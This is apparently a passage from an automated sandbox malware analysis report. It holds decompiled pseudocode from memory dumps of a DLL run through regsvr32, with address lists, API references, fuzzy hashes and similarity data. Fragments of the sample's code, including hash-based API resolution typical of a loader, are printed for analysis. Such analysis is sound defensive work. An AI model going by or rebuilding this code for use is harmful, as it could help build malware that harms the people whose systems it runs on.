				 *((intOrPtr*)(__rcx + 0x41000031)) =  *((intOrPtr*)(__rcx + 0x41000031)) - _t87;
				 *0x2444896600003A11 =  *0x2444896600003A11 & _t85;
				spl = spl ^  *0x36e7;
				 *0x36e7 =  *0x36e7 + _t85;
				 *0x2444C74800003670 =  *((long long*)(0x2444c74800003670)) - 1;
				 *0x2444C748000036EA =  *0x2444C748000036EA ^ 0x00000000;
				 *0x2444C74800003674 =  *((intOrPtr*)(0x2444c74800003674)) + _t87;
				 *0x36e7 =  *0x36e7 + _t85;
				_t110[0xcf] = 0;
				_t110[0x24] = 1;
				 *((intOrPtr*)(_t110[0xc] + 0x100)) =  *((intOrPtr*)(_t110[0xc] + 0x100)) + _t110[0x44];
				_t110[0x44] = _t110[0x44] - 1;
				goto 0x130f98b8;
				_v40 = __r13;
				if (_t110[0x54] != ( *_t110 | _t88)) goto 0x130f98cb;
				_v32 = __r12;
				_v48 = __r14;
				_v56 = __r15;
				asm("o16 nop [eax+eax]");
				if (r8d - (_t110[0x54] & 0x00001f2c) < 0) goto 0x130f987f;
				LeaveCriticalSection(??);
				r12d = _t110[0x32];
				r8d = r12d;
				r8d = r8d & _t91;
				r9d = _t110[0x74];
				r11d = _t110[0x68];
				r9d = r9d | _t89;
				r11d = r11d | _t110[0x50];
				r12d = r12d ^ 0x00001f2c;
				r10d = _a64;
				r12d = r12d - _t85;
				r10d = r10d | 0x00002032;
				r11d = r11d - _t110[0x1e];
				r14d = _t110[0x78];
				r10d = r10d & _a80;
				r14d = r14d | _t85;
				r15d =  *_t110;
				r15d = r15d - _t110[0x16];
				r15d = r15d - 0x2103;
				_v64 = r11d;
				_v72 = r12d;
				_v80 = _t110[0x8a] ^ 0x00003666;
				_v88 = r10d;
				_v96 = _t110;
				_v104 = _t110[0x10];
				_v112 = _a32 + 0x38e9;
				_v120 = _t110[0x54] * _a40 - _a96;
				_v128 = r14d;
				_v136 = r15d;
				_t86 = E00007FFC7FFC130EA4F0(_a32 + 0x38e9, _t110, _a16 + 0xfffff0c7, _t110[0x72] | __rdx - 0x00003189, _t110[0x10], __r8, __r9);
				r8d = _t86;
				_a80 = _a80 + _t110[0x1e] + _a96;
				r13d = r13d + 3;
				if (r13d == ( *_t110 | _t88)) goto 0x130f9760;
				return _t86;
			}




























                                0x7ffc130f961b
                                0x7ffc130f9622
                                0x7ffc130f9629
                                0x7ffc130f963e
                                0x7ffc130f9645
                                0x7ffc130f964b
                                0x7ffc130f9652
                                0x7ffc130f9659
                                0x7ffc130f9666
                                0x7ffc130f9675
                                0x7ffc130f967c
                                0x7ffc130f968a
                                0x7ffc130f9693
                                0x7ffc130f9699
                                0x7ffc130f96a0
                                0x7ffc130f96a8
                                0x7ffc130f96b2
                                0x7ffc130f96bd
                                0x7ffc130f96cc
                                0x7ffc130f96cf
                                0x7ffc130f96d1
                                0x7ffc130f96df
                                0x7ffc130f96e2
                                0x7ffc130f96e6
                                0x7ffc130f96ec
                                0x7ffc130f96ee
                                0x7ffc130f96fc
                                0x7ffc130f970a
                                0x7ffc130f9717
                                0x7ffc130f971e
                                0x7ffc130f9729
                                0x7ffc130f973e
                                0x7ffc130f9744
                                0x7ffc130f974c
                                0x7ffc130f9751
                                0x7ffc130f9756
                                0x7ffc130f9772
                                0x7ffc130f9778
                                0x7ffc130f977e
                                0x7ffc130f9785
                                0x7ffc130f978f
                                0x7ffc130f9792
                                0x7ffc130f9799
                                0x7ffc130f97a0
                                0x7ffc130f97af
                                0x7ffc130f97be
                                0x7ffc130f97c5
                                0x7ffc130f97cd
                                0x7ffc130f97d6
                                0x7ffc130f97dd
                                0x7ffc130f97e7
                                0x7ffc130f97ee
                                0x7ffc130f97f6
                                0x7ffc130f97f9
                                0x7ffc130f9801
                                0x7ffc130f980c
                                0x7ffc130f9821
                                0x7ffc130f9826
                                0x7ffc130f982b
                                0x7ffc130f982f
                                0x7ffc130f983b
                                0x7ffc130f9840
                                0x7ffc130f9844
                                0x7ffc130f9848
                                0x7ffc130f984c
                                0x7ffc130f9851
                                0x7ffc130f9856
                                0x7ffc130f985e
                                0x7ffc130f986a
                                0x7ffc130f9882
                                0x7ffc130f9892
                                0x7ffc130f98ca

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: CriticalLeaveSection
                                • String ID:
                                • API String ID: 3988221542-0
                                • Opcode ID: 473156c768860ec0aa82b0bbaedf760dbbe2600152b2228a14ed45a4eaae335e
                                • Instruction ID: ff27112cde60e09469b74aa2727b065e55600586ecd25aeb54ebdbcb6788062f
                                • Opcode Fuzzy Hash: 473156c768860ec0aa82b0bbaedf760dbbe2600152b2228a14ed45a4eaae335e
                                • Instruction Fuzzy Hash: 616144736086C58BE361CF25E4407DAB7A8F788B48F044139DB8957B58EB38E9A4CF10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00734A80 Relevance: 1.3, APIs: 1, Instructions: 89memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E00734A80(void* __ebx, void* __ecx, void* __edx, void* __ebp, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, signed int __r9, void* _a8, void* _a16, void* _a24, void* _a32, intOrPtr _a40, unsigned int _a48, unsigned int _a56, signed int _a64) {
				signed int _v40;
				signed int _t27;
				signed int _t30;
				signed int _t36;
				signed int _t38;
				signed int _t39;
				void* _t40;
				signed int _t48;
				void* _t51;
				signed int _t52;
				void* _t54;
				intOrPtr* _t56;
				intOrPtr* _t69;
				signed int _t71;
				signed int _t74;
				void* _t76;
				intOrPtr _t90;

				_t79 = __r8;
				_t71 = __rsi;
				_t56 = __rcx;
				_t40 = __ecx;
				_t35 = __ebx;
				_t51 = _t76;
				 *((long long*)(_t51 + 8)) = __rbx;
				 *((long long*)(_t51 + 0x10)) = __rbp;
				 *((long long*)(_t51 + 0x18)) = __rsi;
				 *((long long*)(_t51 + 0x20)) = __rdi;
				_t52 =  *0x73d458;
				_t90 =  *__rcx;
				_t74 = __r9;
				_t54 = __r8;
				_t83 = __rdx;
				_t69 = __rcx;
				if(__rdx == 0) {
					L3:
					r12d =  *((intOrPtr*)(_t69 + 0x68));
					r9d = _a56;
					r8d = r12d;
					_v40 = _a64;
					_t27 = E007331C0(_t35, _t40, __eflags, _t54, _t69, _t54, _t79, _t83); // executed
					_t36 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						L13:
						 *(_t69 + 0x58) = _t36;
						return _t36;
					}
					__eflags = _t74;
					if(_t74 == 0) {
						L6:
						_t38 = _a48 >> 0x14;
						__eflags = _t38;
						if(_t38 == 0) {
							_t39 =  *(_t69 + 0x6c);
							_t48 =  *(_t69 + 0x70);
						} else {
							_t39 = _t38 *  *(_t69 + 0x6c);
							_t48 = _t39;
						}
						E0073908C(0x41b0cf8e, _t52,  *((intOrPtr*)(_t90 + 0x48)));
						__eflags = _t52;
						if(_t52 != 0) {
							r9d = _t39;
							r8d = r12d;
							_v40 = _t48;
							 *_t52();
						}
						r9d = _a48;
						_t30 = E007375F8(_t40, _t52, _t54, _t69, _t71, _a40); // executed
						_t36 = _t30;
						__eflags = _t71;
						if(_t71 != 0) {
							__eflags = 0;
							HeapFree(??, ??, ??);
						}
						goto L13;
					}
					E00736C34(_t36, _t54, _t74, _t69, _t71, _t74, _t79);
					_t71 = _t52;
					__eflags = _t52;
					if(_t52 == 0) {
						L2:
						_t36 = 8;
						goto L13;
					}
					goto L6;
				}
				_t6 = _t56 + 0x10; // 0x2
				_t79 = _t6;
				_t7 = _t56 + 8; // -6
				if(E00739B88(__ebx, __r8, __rdx, _t7, __rsi, _t6) != 0) {
					goto L3;
				}
				goto L2;
			}




















                                0x00734a80
                                0x00734a80
                                0x00734a80
                                0x00734a80
                                0x00734a80
                                0x00734a80
                                0x00734a83
                                0x00734a87
                                0x00734a8b
                                0x00734a8f
                                0x00734a9d
                                0x00734aa4
                                0x00734aad
                                0x00734ab0
                                0x00734ab3
                                0x00734ab6
                                0x00734abc
                                0x00734adc
                                0x00734adc
                                0x00734ae7
                                0x00734aef
                                0x00734af8
                                0x00734afc
                                0x00734b01
                                0x00734b03
                                0x00734b05
                                0x00734b8b
                                0x00734b95
                                0x00734bae
                                0x00734bae
                                0x00734b0b
                                0x00734b0e
                                0x00734b22
                                0x00734b26
                                0x00734b29
                                0x00734b2b
                                0x00734b35
                                0x00734b38
                                0x00734b2d
                                0x00734b2d
                                0x00734b31
                                0x00734b31
                                0x00734b44
                                0x00734b49
                                0x00734b4c
                                0x00734b52
                                0x00734b55
                                0x00734b5b
                                0x00734b5f
                                0x00734b5f
                                0x00734b61
                                0x00734b71
                                0x00734b76
                                0x00734b78
                                0x00734b7b
                                0x00734b80
                                0x00734b85
                                0x00734b85
                                0x00000000
                                0x00734b7b
                                0x00734b15
                                0x00734b1a
                                0x00734b1d
                                0x00734b20
                                0x00734ad2
                                0x00734ad2
                                0x00000000
                                0x00734ad2
                                0x00000000
                                0x00734b20
                                0x00734abe
                                0x00734abe
                                0x00734ac2
                                0x00734ad0
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • HeapFree.KERNEL32 ref: 00734B85
                                  • Part of subcall function 00739B88: HeapAlloc.KERNEL32 ref: 00739BEA
                                  • Part of subcall function 00739B88: HeapAlloc.KERNEL32 ref: 00739C04
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Alloc$Free
                                • String ID:
                                • API String ID: 1549400367-0
                                • Opcode ID: 0438c88f5e4c29cc0bfbf823165f6398d9b9537c29dc3537e3679cfc667b61ef
                                • Instruction ID: c0e8123a1594f9192a5c82c5012a603a79a4c15f5714eb030c9028894eccaf6b
                                • Opcode Fuzzy Hash: 0438c88f5e4c29cc0bfbf823165f6398d9b9537c29dc3537e3679cfc667b61ef
                                • Instruction Fuzzy Hash: 09316B76704B8586EB18DB6B9580719B7A0F788FD4F4880269F8847B16DB3CE852CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0073240C Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • HeapAlloc.KERNEL32 ref: 00732461
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: AllocErrorHeapLast
                                • String ID:
                                • API String ID: 1314224567-0
                                • Opcode ID: 114887a3b61755fca8836de62ef990b92a7ac42fee645ab10b540a5911a616a2
                                • Instruction ID: 63998b8310d2208f499512246b29978498330bccc7e4086d8656c53acca8f821
                                • Opcode Fuzzy Hash: 114887a3b61755fca8836de62ef990b92a7ac42fee645ab10b540a5911a616a2
                                • Instruction Fuzzy Hash: 7C016932714B9489EB189F67A85026977A1FBC8FC0F598025AE4E4371ADF39E942C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 00736DF0 Relevance: 15.3, APIs: 7, Strings: 3, Instructions: 303memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E00736DF0(void* __ebx, void* __ecx, long long __rbx, intOrPtr* __rcx, signed long long __rdx) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t79;
				void* _t81;
				void* _t95;
				void* _t111;
				void* _t112;
				intOrPtr _t117;
				intOrPtr _t144;
				void* _t146;
				void* _t147;
				long long* _t158;
				long long* _t160;
				long long _t161;
				intOrPtr* _t199;
				long long** _t204;
				void* _t206;
				signed long long _t211;
				long long _t214;
				void* _t216;
				void* _t217;
				void* _t237;
				intOrPtr _t240;
				long long* _t247;

				_t202 = __rdx;
				_t161 = __rbx;
				_t116 = __ecx;
				_t237 = _t216;
				 *((long long*)(_t237 + 8)) = __rbx;
				 *((long long*)(_t237 + 0x10)) = __rdx;
				_push(_t206);
				_t217 = _t216 - 0x40;
				r14d =  *0x73d450;
				_t211 = __rdx;
				_t204 = __rcx;
				 *((long long*)(_t217 + 0x38)) =  *((intOrPtr*)( *0x73d458 + 8));
				if(E007391C8(__ecx, r14d ^ 0x55e7ce26,  *((intOrPtr*)( *0x73d458 + 8)), __rbx, __rdx, __rdx, __rcx, _t206, _t237 - 0x58, _t237 + 0x18, _t237) != 0) {
					L64:
					_t111 = 1;
					L65:
					return _t111;
				}
				_t252 =  *0x73d458;
				_t240 =  *((intOrPtr*)(_t217 + 0x20));
				_t158 =  *((intOrPtr*)(__rcx));
				_t208 =  *((intOrPtr*)( *0x73d458 + 8));
				 *((long long*)(_t217 + 0x98)) = _t158;
				 *((long long*)(_t217 + 0x30)) =  *((intOrPtr*)( *0x73d458 + 8));
				if(_t240 == 0) {
					L41:
					_t111 = 0x57;
					L42:
					HeapFree();
					if(_t111 != 0) {
						goto L65;
					}
					if(E007391C8(_t116, r14d ^ 0x881e33f6, _t158, _t161, _t211, _t202, _t204, _t208, _t217 + 0x20, _t217 + 0x90, _t237) != 0) {
						goto L64;
					}
					_t79 = E0073672C( *((intOrPtr*)(_t217 + 0x20)), _t202, _t217 + 0x98);
					_t117 =  *((intOrPtr*)(_t217 + 0x98));
					if(_t79 != 0 || _t117 != 0) {
						 *((intOrPtr*)(_t204 + 0x28)) = _t117;
						if(E007391C8(_t117, r14d ^ 0xa2dd2342, _t158, _t161, _t211, _t202, _t204, _t208, _t217 + 0x20, _t217 + 0x90, _t237) == 0) {
							_t246 =  *0x73d458;
							_t46 = _t158 + 0x10; // 0x10
							_t112 = _t46;
							_t146 =  <  ?  *((void*)(_t217 + 0x90)) : _t112;
							E0073908C(0x4a75e5e7, _t158,  *((intOrPtr*)( *0x73d458 + 0x10)));
							if(_t158 != 0) {
								 *_t158();
							}
							_t202 =  *((intOrPtr*)(_t217 + 0x20));
							r8d = _t146;
							L007347B0();
							if(_t146 < _t112) {
								r8d = _t112 - _t146;
								E0073487A();
							}
							E0073908C(0x8d72aad2, _t158,  *((intOrPtr*)(_t246 + 0x10)));
							if(_t158 != 0) {
								 *_t158();
							}
							HeapFree();
							_t211 =  *((intOrPtr*)(_t217 + 0x88));
						}
						r14d = r14d ^ 0x1a1a0866;
						_t81 = E007391C8(_t117, r14d, _t158, _t161, _t211, _t202, _t204, _t208, _t217 + 0x20, _t217 + 0x90, _t237);
						_t111 = _t81;
						if(_t81 == 0 && E0073672C( *((intOrPtr*)(_t217 + 0x20)), _t202, _t217 + 0x98) != 0 &&  *((intOrPtr*)(_t217 + 0x98)) != 0) {
							_t209 =  *0x73d458;
							E0073908C(0x4a75e5e7, _t158,  *((intOrPtr*)( *0x73d458 + 0x10)));
							if(_t158 != 0) {
								 *_t158();
							}
							E0073908C(0x9c66d81c, _t158,  *((intOrPtr*)(_t209 + 0x18)));
							if(_t158 != 0) {
								 *_t158();
							}
							_t160 =  *((intOrPtr*)(_t217 + 0x28)) + _t211 * 0x23c34600;
							 *((long long*)(_t217 + 0x28)) = _t160;
							 *((long long*)(_t204 + 0x30)) = _t160;
							E0073908C(0x8d72aad2, _t160,  *((intOrPtr*)(_t209 + 0x10)));
							if(_t160 != 0) {
								 *_t160();
							}
						}
						goto L65;
					} else {
						goto L64;
					}
				}
				r13d = 0xfb849f8f;
				E0073908C(r13d, _t158,  *((intOrPtr*)(_t252 + 0x18)));
				if(_t158 == 0) {
					_t95 = 0;
				} else {
					_t95 =  *_t158();
				}
				r8d = _t95 + 1;
				HeapAlloc(??, ??, ??);
				_t208 = _t158;
				 *((long long*)(_t217 + 0x28)) = _t158;
				if(_t158 == 0) {
					_t111 = 8;
					goto L42;
				} else {
					_t202 = _t240;
					L007347B0();
					_t189 =  *0x73d458;
					_t214 = _t208;
					_t161 =  *((intOrPtr*)( *0x73d458 + 8));
					while( *_t214 == 0x20 ||  *_t214 == 9) {
						_t214 = _t214 + 1;
					}
					if( *_t214 == 0) {
						_t147 = 0;
						L29:
						_t247 =  *((intOrPtr*)(_t217 + 0x90));
						L30:
						if(_t147 == 0) {
							HeapFree();
							_t211 =  *((intOrPtr*)(_t217 + 0x88));
							goto L41;
						}
						E0073908C(0x4a75e5e7, _t158,  *((intOrPtr*)(_t252 + 0x10)));
						if(_t158 != 0) {
							 *_t158();
						}
						_t161 =  *((intOrPtr*)(_t204 + 0x40));
						 *((long long*)(_t204 + 0x40)) =  *((intOrPtr*)(_t217 + 0x28));
						 *((long long*)(_t204 + 0x48)) = _t247;
						 *((intOrPtr*)(_t204 + 0x50)) = sil;
						if( *((char*)(_t204 + 0x70)) != 0) {
							 *((char*)(_t204 + 0x70)) = 0;
						}
						asm("lock and dword [edi+0x2c], 0xfffffffe");
						E0073908C(0x8d72aad2, _t158,  *((intOrPtr*)(_t252 + 0x10)));
						if(_t158 != 0) {
							 *_t158();
						}
						if(_t161 != 0) {
							_t161 =  *((intOrPtr*)(_t217 + 0x30));
							HeapFree(??, ??, ??);
							HeapFree(??, ??, ??);
						}
						_t240 =  *((intOrPtr*)(_t217 + 0x20));
						_t211 =  *((intOrPtr*)(_t217 + 0x88));
						_t111 = 0;
						goto L42;
					}
					E0073908C(r13d, _t158,  *((intOrPtr*)(_t189 + 0x18)));
					if(_t158 == 0) {
					} else {
						 *_t158();
					}
					asm("cdq");
					_t15 = _t158 + 1; // 0x1
					r8d = _t15;
					HeapAlloc(??, ??, ??);
					_t147 = 0;
					_t247 = _t158;
					if(_t158 == 0) {
						goto L29;
					} else {
						do {
							_t144 =  *_t214;
							_t199 = _t214;
							if(_t144 == 0) {
								L20:
								_t116 = 0;
								L21:
								if(_t199 == 0) {
									goto L26;
								}
								 *_t199 = 0;
								_t199 = _t199 + 1;
								while( *_t199 == 0x20 ||  *_t199 == 9) {
									_t199 = _t199 + 1;
								}
								goto L26;
							}
							while(_t144 != 0x20) {
								_t199 = _t199 + 1;
								_t144 =  *_t199;
								if(_t144 != 0) {
									continue;
								}
								break;
							}
							if(_t144 != 0) {
								goto L21;
							}
							goto L20;
							L26:
							 *_t158 = _t214;
							_t147 = _t147 + 1;
							_t158 = _t158 + _t161;
							_t214 = _t199;
						} while (_t199 != 0);
						goto L30;
					}
				}
			}




























                                0x00736df0
                                0x00736df0
                                0x00736df0
                                0x00736df0
                                0x00736df3
                                0x00736df7
                                0x00736dfc
                                0x00736e06
                                0x00736e11
                                0x00736e18
                                0x00736e22
                                0x00736e36
                                0x00736e42
                                0x00737239
                                0x00737239
                                0x0073723e
                                0x00737257
                                0x00737257
                                0x00736e48
                                0x00736e4f
                                0x00736e54
                                0x00736e57
                                0x00736e5b
                                0x00736e63
                                0x00736e6b
                                0x0073703b
                                0x0073703b
                                0x00737040
                                0x0073704d
                                0x00737055
                                0x00000000
                                0x00000000
                                0x0073707b
                                0x00000000
                                0x00000000
                                0x00737090
                                0x00737095
                                0x0073709e
                                0x007370ab
                                0x007370cb
                                0x007370d1
                                0x007370db
                                0x007370db
                                0x007370eb
                                0x007370f8
                                0x00737100
                                0x00737107
                                0x00737107
                                0x00737109
                                0x00737112
                                0x00737117
                                0x0073711e
                                0x0073712c
                                0x0073712f
                                0x0073712f
                                0x0073713d
                                0x00737145
                                0x0073714c
                                0x0073714c
                                0x00737158
                                0x0073715e
                                0x0073715e
                                0x00737166
                                0x00737180
                                0x00737185
                                0x00737189
                                0x007371ba
                                0x007371cd
                                0x007371d5
                                0x007371dc
                                0x007371dc
                                0x007371e7
                                0x007371ef
                                0x007371f6
                                0x007371f6
                                0x0073720c
                                0x0073720f
                                0x00737214
                                0x0073721c
                                0x00737224
                                0x0073722b
                                0x0073722b
                                0x00737224
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0073709e
                                0x00736e75
                                0x00736e7e
                                0x00736e86
                                0x00736e8f
                                0x00736e88
                                0x00736e8b
                                0x00736e8b
                                0x00736e98
                                0x00736e9d
                                0x00736ea3
                                0x00736ea6
                                0x00736eae
                                0x0073722f
                                0x00000000
                                0x00736eb4
                                0x00736eb7
                                0x00736ebd
                                0x00736ec2
                                0x00736ec9
                                0x00736ecc
                                0x00736ed0
                                0x00736edc
                                0x00736edc
                                0x00736ee5
                                0x00736f74
                                0x00736f76
                                0x00736f76
                                0x00736f7e
                                0x00736f80
                                0x0073702d
                                0x00737033
                                0x00000000
                                0x00737033
                                0x00736f8f
                                0x00736f9f
                                0x00736fa6
                                0x00736fa6
                                0x00736fad
                                0x00736fb5
                                0x00736fb9
                                0x00736fbd
                                0x00736fc5
                                0x00736fc7
                                0x00736fc7
                                0x00736fcb
                                0x00736fd9
                                0x00736fe1
                                0x00736fe8
                                0x00736fe8
                                0x00736fed
                                0x00736ff2
                                0x00736ffc
                                0x0073700a
                                0x0073700a
                                0x00737010
                                0x00737015
                                0x0073701d
                                0x00000000
                                0x0073701d
                                0x00736ef2
                                0x00736efa
                                0x00736efc
                                0x00736eff
                                0x00736eff
                                0x00736f05
                                0x00736f0f
                                0x00736f0f
                                0x00736f17
                                0x00736f1d
                                0x00736f1f
                                0x00736f25
                                0x00000000
                                0x00736f27
                                0x00736f2a
                                0x00736f2a
                                0x00736f2d
                                0x00736f32
                                0x00736f46
                                0x00736f46
                                0x00736f48
                                0x00736f4b
                                0x00000000
                                0x00000000
                                0x00736f4d
                                0x00736f50
                                0x00736f53
                                0x00736f5d
                                0x00736f5d
                                0x00000000
                                0x00736f53
                                0x00736f34
                                0x00736f39
                                0x00736f3c
                                0x00736f40
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00736f40
                                0x00736f44
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00736f62
                                0x00736f62
                                0x00736f65
                                0x00736f67
                                0x00736f6a
                                0x00736f6d
                                0x00000000
                                0x00736f72
                                0x00736f25

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID: uJ$uJ$uJ
                                • API String ID: 1659099196-303439786
                                • Opcode ID: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                                • Instruction ID: 2b94d5c563adb2f9cc699e4549cf52e79e464f4774027de4a12a7639eac05603
                                • Opcode Fuzzy Hash: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                                • Instruction Fuzzy Hash: 72B1D366708B8595FB38DF62E4443AA67A1FBC8B84F488026DE8D43706DF3CD949C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EE374 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 65%
                                			E00007FFC7FFC130EE374(void* __ecx, void* __edx, void* __esp, long long __rbx, long long __rdx, long long __rsi, void* __r8) {
				void* __rdi;
				void* _t36;
				long _t42;
				void* _t43;
				signed long long _t54;
				long long _t57;
				long long _t61;
				void* _t65;
				_Unknown_base(*)()* _t84;
				void* _t90;
				void* _t91;
				void* _t93;
				signed long long _t94;
				struct _EXCEPTION_POINTERS* _t100;

				_t44 = __ecx;
				 *((long long*)(_t93 + 0x10)) = __rbx;
				 *((long long*)(_t93 + 0x18)) = __rsi;
				_t3 = _t93 - 0x4f0; // -1288
				_t91 = _t3;
				_t94 = _t93 - 0x5f0;
				_t54 =  *0x13123760; // 0xe67021d0ea18
				 *(_t91 + 0x4e0) = _t54 ^ _t94;
				if (_t65 == 0xffffffff) goto 0x130ee3b3;
				E00007FFC7FFC130EBC04(_t36);
				_t5 = _t94 + 0x70; // 0x58
				r8d = 0x98;
				E00007FFC7FFC130EC440(__ecx, __edx, r8d, __esp, _t5, 0, _t84, __r8);
				_t6 = _t91 + 0x10; // -1272
				r8d = 0x4d0;
				E00007FFC7FFC130EC440(_t44, __edx, r8d, __esp, _t6, 0, _t84, __r8);
				_t7 = _t94 + 0x70; // 0x58
				 *((long long*)(_t94 + 0x48)) = _t7;
				_t10 = _t91 + 0x10; // -1272
				_t57 = _t10;
				 *((long long*)(_t94 + 0x50)) = _t57;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t57 == 0) goto 0x130ee446;
				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
				_t16 = _t94 + 0x60; // 0x48
				 *((long long*)(_t94 + 0x30)) = _t16;
				_t19 = _t94 + 0x58; // 0x40
				 *((long long*)(_t94 + 0x28)) = _t19;
				_t21 = _t91 + 0x10; // -1272
				 *((long long*)(_t94 + 0x20)) = _t21;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
				_t25 = _t91 + 0x508; // 0x0
				 *((long long*)(_t94 + 0x70)) = __rdx;
				 *((long long*)(_t91 + 0xa8)) = _t25 + 8;
				_t61 =  *((intOrPtr*)(_t91 + 0x508));
				 *((long long*)(_t91 - 0x80)) = _t61;
				 *(_t94 + 0x74) = _t84;
				IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t84, _t90);
				_t42 = UnhandledExceptionFilter(_t100);
				if (_t61 != 0) goto 0x130ee4a8;
				if (_t61 != 0) goto 0x130ee4a8;
				if (_t65 == 0xffffffff) goto 0x130ee4a8;
				_t43 = E00007FFC7FFC130EBC04(_t42);
				E00007FFC7FFC130F6D80();
				return _t43;
			}

















                                0x7ffc130ee374
                                0x7ffc130ee374
                                0x7ffc130ee379
                                0x7ffc130ee382
                                0x7ffc130ee382
                                0x7ffc130ee38a
                                0x7ffc130ee391
                                0x7ffc130ee39b
                                0x7ffc130ee3ac
                                0x7ffc130ee3ae
                                0x7ffc130ee3b5
                                0x7ffc130ee3ba
                                0x7ffc130ee3c0
                                0x7ffc130ee3c7
                                0x7ffc130ee3cb
                                0x7ffc130ee3d1
                                0x7ffc130ee3d6
                                0x7ffc130ee3db
                                0x7ffc130ee3e4
                                0x7ffc130ee3e4
                                0x7ffc130ee3e8
                                0x7ffc130ee3ed
                                0x7ffc130ee402
                                0x7ffc130ee405
                                0x7ffc130ee40e
                                0x7ffc130ee410
                                0x7ffc130ee416
                                0x7ffc130ee423
                                0x7ffc130ee42b
                                0x7ffc130ee430
                                0x7ffc130ee435
                                0x7ffc130ee439
                                0x7ffc130ee440
                                0x7ffc130ee44d
                                0x7ffc130ee454
                                0x7ffc130ee45f
                                0x7ffc130ee463
                                0x7ffc130ee46a
                                0x7ffc130ee471
                                0x7ffc130ee475
                                0x7ffc130ee479
                                0x7ffc130ee483
                                0x7ffc130ee48e
                                0x7ffc130ee496
                                0x7ffc130ee49a
                                0x7ffc130ee49f
                                0x7ffc130ee4a3
                                0x7ffc130ee4b2
                                0x7ffc130ee4ce

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                • String ID:
                                • API String ID: 1239891234-0
                                • Opcode ID: 07dcb6749cf727804a818c63ef9eb218394f6ec07e419224f6cd5021fde535cb
                                • Instruction ID: b8fa9b1c3342f5cd195a218d8db54b39ca3dff7b40b19d0f41d7a57df183d9ef
                                • Opcode Fuzzy Hash: 07dcb6749cf727804a818c63ef9eb218394f6ec07e419224f6cd5021fde535cb
                                • Instruction Fuzzy Hash: EE316E36708F9586EB60CF25E8442AE73A4FB88768F500535EA9D53B98DF3CC565CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

